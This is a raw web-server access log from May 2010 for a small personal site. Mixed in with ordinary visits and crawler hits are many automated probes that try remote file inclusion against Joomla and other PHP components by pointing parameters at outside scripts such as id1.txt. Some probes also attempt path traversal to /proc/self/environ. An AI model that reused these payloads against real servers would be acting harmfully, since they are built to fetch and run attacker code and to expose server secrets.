124.49.100.254 - - [01/May/2010:03:22:41 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:22:41 -0500] "GET /logs/access_log.1268611200%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/id1.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:22:52 -0500] "GET /logs/access_log.1219708800%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/id1.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
80.94.235.173 - - [01/May/2010:03:24:21 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://gotika.webpark.cz/anglicky/x_01_01.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:30 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:30 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:33 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:34 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:34 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:34 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:35 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:38 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:42 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:43 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:44 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:44 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.94.235.173 - - [01/May/2010:03:24:44 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
207.46.13.84 - - [01/May/2010:03:27:24 -0500] "GET /logs/access_log.1212969600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [01/May/2010:03:31:07 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:03:31:07 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:03:31:07 -0500] "GET /logs/access_log.1270684800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:03:31:13 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:03:31:13 -0500] "GET /logs/access_log.1270684800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:03:31:13 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:03:31:45 -0500] "GET /logs/access_log.1268956800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
88.191.94.188 - - [01/May/2010:03:31:50 -0500] "GET /logs/access_log.1268956800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
81.80.122.44 - - [01/May/2010:03:34:54 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
81.80.122.44 - - [01/May/2010:03:34:54 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [01/May/2010:03:34:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
124.49.100.254 - - [01/May/2010:03:36:00 -0500] "GET /logs/access_log.1270598400%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:36:00 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:36:00 -0500] "GET /logs/access_log.1268611200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:36:00 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:36:10 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:36:10 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:36:10 -0500] "GET /logs/access_log.1270598400%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:36:10 -0500] "GET /logs/access_log.1268611200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:03:36:13 -0500] "GET //appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:03:36:13 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:03:36:13 -0500] "GET /logs/access_log.1268956800%20%20//appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:03:36:17 -0500] "GET //appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:03:36:17 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
114.108.151.149 - - [01/May/2010:03:36:18 -0500] "GET /logs/access_log.1268956800%20%20//appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:36:23 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:36:23 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:36:23 -0500] "GET /logs/access_log.1270598400%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:36:23 -0500] "GET /logs/access_log.1268611200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:36:45 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:36:45 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:36:46 -0500] "GET /logs/access_log.1270598400//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:36:47 -0500] "GET /logs/access_log.1268611200//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:03:38:01 -0500] "GET /logs/access_log.1243468800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [01/May/2010:03:38:43 -0500] "GET /logs/access_log.1219708800/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:03:38:43 -0500] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:03:38:43 -0500] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.195.240 - - [01/May/2010:03:42:25 -0500] "GET /logs/access_log.1246492800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.202.229.210 - - [01/May/2010:03:42:35 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_04"
115.124.119.4 - - [01/May/2010:03:45:05 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:45:05 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:03:45:06 -0500] "GET /logs/access_log.1262476800//components/com_facileforms/facileforms.frame.php?ff_compath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.80.122.44 - - [01/May/2010:03:45:45 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
81.80.122.44 - - [01/May/2010:03:45:45 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [01/May/2010:03:45:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
81.176.226.186 - - [01/May/2010:03:45:57 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.176.226.186 - - [01/May/2010:03:45:57 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
121.88.4.141 - - [01/May/2010:03:48:03 -0500] "GET /logs//include/prodler.class.php?sPath=http://www.kangnung.org//zb//idxx.txt????????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [01/May/2010:03:48:03 -0500] "GET /logs/access_log.1265673600//include/prodler.class.php?sPath=http://www.kangnung.org//zb//idxx.txt????????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.88.4.141 - - [01/May/2010:03:48:03 -0500] "GET //include/prodler.class.php?sPath=http://www.kangnung.org//zb//idxx.txt????????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.88.4.141 - - [01/May/2010:03:48:17 -0500] "GET /logs/access_log.1266278400//include/prodler.class.php?sPath=http://www.kangnung.org//zb//idxx.txt????????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
202.70.136.22 - - [01/May/2010:03:49:24 -0500] "GET /logs/access_log.1229731200/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kesehatanibu.depkes.go.id/xmlrpc/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
202.70.136.22 - - [01/May/2010:03:49:25 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kesehatanibu.depkes.go.id/xmlrpc/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
202.70.136.22 - - [01/May/2010:03:49:25 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kesehatanibu.depkes.go.id/xmlrpc/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
78.110.50.119 - - [01/May/2010:03:50:30 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.110.50.119 - - [01/May/2010:03:50:30 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.70.136.22 - - [01/May/2010:03:51:18 -0500] "GET /logs/access_log.1228089600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kesehatanibu.depkes.go.id/xmlrpc/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
119.63.198.20 - - [01/May/2010:03:52:09 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Baiduspider+(+http://www.baidu.jp/spider/)"
121.88.4.141 - - [01/May/2010:03:54:51 -0500] "GET /logs//include/prodler.class.php?sPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [01/May/2010:03:54:51 -0500] "GET /logs/access_log.1265673600//include/prodler.class.php?sPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.88.4.141 - - [01/May/2010:03:54:52 -0500] "GET //include/prodler.class.php?sPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.88.4.141 - - [01/May/2010:03:54:58 -0500] "GET /logs/access_log.1266278400//include/prodler.class.php?sPath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:03:57:19 -0500] "GET /logs/access_log.1217376000/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:03:57:19 -0500] "GET /logs/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:03:57:19 -0500] "GET /config.php?_CCFG[_PKG_PATH_DBSE]=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:03:57:35 -0500] "GET /logs/access_log.1217030400/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:04:00:21 -0500] "GET /artwork/toys.htm HTTP/1.1" 200 1337 "-""Yandex/1.01.001 (compatible; Win16; I)"
206.53.52.78 - - [01/May/2010:04:01:35 -0500] "GET /logs//index.php?option=com_facileforms=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
206.53.52.78 - - [01/May/2010:04:01:35 -0500] "GET //index.php?option=com_facileforms=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
124.49.100.254 - - [01/May/2010:04:01:41 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:01:41 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:01:41 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:01:41 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:01:41 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:01:41 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
206.53.52.78 - - [01/May/2010:04:02:15 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
206.53.52.78 - - [01/May/2010:04:02:15 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
189.108.172.26 - - [01/May/2010:04:03:02 -0500] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:04:03:02 -0500] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:04:03:02 -0500] "GET /logs/access_log.1268956800/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:06:58 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:06:58 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:06:58 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.241.190.214 - - [01/May/2010:04:07:15 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
92.241.190.214 - - [01/May/2010:04:07:15 -0500] "GET //?path%5Bdocroot%5D=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
92.241.190.214 - - [01/May/2010:04:07:15 -0500] "GET /logs//?path%5Bdocroot%5D=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 200 3858 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
124.49.100.254 - - [01/May/2010:04:08:33 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:08:33 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:08:33 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:08:58 -0500] "GET /logs///gswheel_system_bak/skin/board/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:08:58 -0500] "GET ///gswheel_system_bak/skin/board/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:08:58 -0500] "GET /logs/access_log.1260576000///gswheel_system_bak/skin/board/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:04:09:39 -0500] "GET /logs/access_log.1270598400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:04:09:39 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:04:09:39 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:10:32 -0500] "GET /logs/access_log.1251504000///gswheel_system_bak/skin/board/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:04:11:57 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:04:11:57 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
